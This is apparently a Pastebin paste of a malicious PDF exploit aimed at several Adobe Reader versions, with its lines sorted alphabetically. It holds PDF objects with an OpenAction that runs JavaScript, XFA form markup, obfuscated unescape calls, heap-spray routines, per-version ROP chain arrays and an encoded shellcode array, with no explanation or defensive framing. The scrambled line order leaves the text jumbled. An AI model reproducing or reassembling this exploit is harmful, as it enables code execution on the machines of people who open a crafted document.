Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @PhysicalDrive0
- });
- 1 0 obj
- 2 0 obj
- 3 0 obj
- 4 0 obj
- 5 0 obj
- 6 0 obj
- 7 0 obj
- aaa += aaa;
- aa=dd13.split("%u");
- aa[i]=str12+aa[i];
- /AcroForm 6 0 R
- addButtonFunc = function () {
- af1="aaaaa%aaaaaaaauaaaaaa";
- af1=af1[("112","a2s1","replace")](/a/g,'');
- app.addToolButton({
- app.addToolButton({
- app.alert('123');
- app.removeToolButton({
- as1211();
- bbb += aaa;
- bbb = bbb.substring(0, i11 / 2);
- bbb += sa;
- bbb += str;
- break;
- ccc += ccc;
- cEnable: "addButtonFunc();"
- cEnable: "removeButtonFunc();"
- cExec: "1",
- cExec: "1",
- cName: "evil"
- cName: "evil",
- cName: "xxx",
- </config>
- <config xmlns="http://www.xfa.org/schema/xci/2.6/">
- /Count 1
- dd13=aa.join('%u');
- dd13=af1+dd13;
- dd13=xx13.join('%u');
- } else {
- } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
- } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
- endobj
- endstream
- for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141");
- for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
- for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
- for (i = 0; i < aa[tt1]; i++)
- for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141");
- function as1211()
- function heapSpray(str, str_addr, r_addr) {
- function opp12(xx13)
- heapSpray(payload, ret_addr, r_addr);
- if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {
- if(ccc[tt] >= (0x40000*2))
- if(j)
- if (!r11) {
- if (vulnerable) {
- j=4-aa[i][tt1];
- /Kids [3 0 R]
- <</Length 10074>>
- <</Length 372>>
- obj_size = 0x330 + 0x1c;
- obj_size = 0x360 + 0x1c;
- obj_size = 0x370;
- /OpenAction 4 0 R
- /Pages 2 0 R
- <pageSet></pageSet>
- /Parent 2 0 R
- part1 += rop_addr;
- %%%%%PDF-6.5
- PE/%%%%%%
- <present><pdf><interactive>1</interactive></pdf></present>
- r11 = true;
- r_addr = 0x08a8;
- r_addr = 0x08e4;
- r_addr = 0x08e8;
- removeButtonFunc = function () {
- ret_addr = this[un12]("%u8003%u4a84");
- ret_addr = this[un12]("%ua83e%u4a82");
- ret_addr = this[un12]("%ua8df%u4a82");
- return;
- return dd13;
- rop_addr = this[un12]("%u08a8%u0c0c");
- rop_addr = this[un12]("%u08e4%u0c0c");
- rop_addr = this[un12]("%u08e8%u0c0c");
- rop = rop10;
- rop = rop11;
- rop = rop9;
- <</Size 8/Root 1 0 R>>
- str12=new Array(j+1).join("0");
- stream
- <subform name="form1" layout="tb" locale="en_US">
- </subform></template></xdp:xdp>
- <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
- trailer
- tt1=tt1[("112","a2s1","replace")](/a/g,'');
- tt=tt[("112","a2s1","replace")](/a/g,'');
- /tYPE/aCTION/S/JavaScript/JS 5 0 R>>
- /type /Page
- /Type /Page
- /Type /Pages
- un12='';
- un12=un12[("112","as1","replace")](/w/g,'');
- un12="uwnwwewwwswcwwwawwpwe";
- var aaa = this[un12]("%u0c0c");
- var arr = new Array();
- var bbb = aaa.substring(0, i1 / 2);
- var ccc = bbb.substring(0, i2 / 2);
- var ddd = ccc.substring(0, 0x80000 - i3);
- var eee = new Array();
- var executable = "";
- var i11 = 0x0c0c - 0x24;
- var i1 = r_addr - 0x24;
- var i2 = 0x4000 + 0xc000;
- var i3 = (0x1020 - 0x08) / 2;
- var obj_size;
- var part1 = "";
- var part2 = "";
- var part2_len = obj_size - part1[tt1] * 2;
- var payload = rop + shellcode;
- var r11 = false;
- var r_addr;
- var ret_addr;
- var rop;
- var rop10 = this[("123","1a1",un12)](opp12(xx132));
- var rop11 = this[("123","1a1",un12)](opp12(xx131));
- var rop9 = this[("123","1a1",un12)](opp12(xx133));
- var rop_addr;
- var sa = str_addr;
- var shellcode = this[("123","1a1",un12)](opp12(xx134));
- var tt1="alaaeaanaaagataaah";
- var tt="alaaeaanaagataah";
- var vulnerable = true;
- var xx131=new Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16));
- var xx132=new Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16));
- var xx133=new Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16));
- var xx134=new Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toString(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16));
- vulnerable = false;
- while (1)
- while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa;
- while (sa[tt] < (xxx - r_addr)) sa += sa;
- x11=9;
- <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
- <</XFA 7 0 R>>
- <?xml version="1.0" encoding="UTF-8"?>
- xxx=0x0c0c;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement